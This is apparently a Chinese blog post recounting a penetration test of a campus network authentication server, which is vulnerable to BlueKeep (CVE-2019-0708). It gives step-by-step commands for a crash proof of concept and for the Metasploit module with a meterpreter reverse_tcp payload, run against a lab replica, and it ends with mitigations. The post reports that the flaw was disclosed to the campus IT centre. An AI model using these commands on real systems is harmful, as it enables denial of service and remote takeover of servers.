记一次校园网渗透测试
ps:发文前已将漏洞反馈至校园信息中心,菜鸡投稿,如有不对的地方还请各位大佬指正
设备连接校园网跳转到了锐捷校园网认证界面

得到校园网服务器地址:10.25.254.11
通过nmap工具扫描端口发现以下端口开放

发现服务器的3389端口开放,推测3389端口可能存在 cve-2019-0708漏洞
利用msf工具进行扫描,发现服务器确实存在该漏洞,通过该漏洞我们可以获取服务器控制权或对服务器发起蓝屏攻击,使服务器瘫痪,或获取服务器shell。

1.对服务器发动蓝屏攻击(本次攻击未攻击校园网服务器,搭建了相同环境的靶机进行测试)
使用漏洞利用工具:git clone https://github.com/n1xbyte/CVE-2019-0708.git
下载完后使用命令 crashpoc.py 192.168.1.108 64 //crashpoc.py 目标ip

运行工具后靶机蓝屏

2.利用该漏洞获取目标shell
使用exploit/windows/rdp/cve_2019_0708_bluekeep_rce漏洞模块
输入命令use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

设置目标:输入命令set rhosts 192.168.1.108

使用payload:输入命令set payload windows/x64/meterpreter/reverse_tcp

设置主机架构:set target 2

执行,获取服务器shell

获取服务器shell后就可以为所欲为了,校园网认证服务器开放的其它端口也存在一些漏洞,目前已将漏洞反馈至校园信息中心,本次渗透未影响服务器正常运行
解决方案:
1.在运行受支持版本的 Windows 7、Windows Server 2008 和 Windows Server 2008 R2 的系统上启用网络级身份验证 (NLA)
2.在企业边界防火墙处阻止 TCP 端口 3389